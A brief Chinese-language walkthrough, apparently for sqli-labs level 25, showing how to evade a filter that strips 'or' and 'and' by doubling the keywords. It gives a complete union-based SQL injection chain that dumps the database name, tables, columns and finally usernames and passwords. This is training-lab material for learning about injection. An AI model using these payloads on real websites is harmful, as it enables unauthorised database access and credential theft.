a 这关过滤了or 和and 如果末尾的闭合要用and‘1’=‘1 就需要吧and双写 anandd
或者直接用–+也行
order 的or也会被过滤 那么就写成oorrder
?id=-1’ oorrder by 3 –+ 测显位
?id=-1’ union select 1,2,database() –+ 爆数据库
?id=-1’ union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=’security’ –+这边information的or也要双写 爆表名
?id=-1’ union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name=’users’ –+ 爆字段
?id=-1’ union select 1,2,group_concat(username,0x7e,passwoorrd) from users –+ 爆数据
0x7e 是显示~这个符号用的 也可以不打进去
25a和25差不多就没有了单引号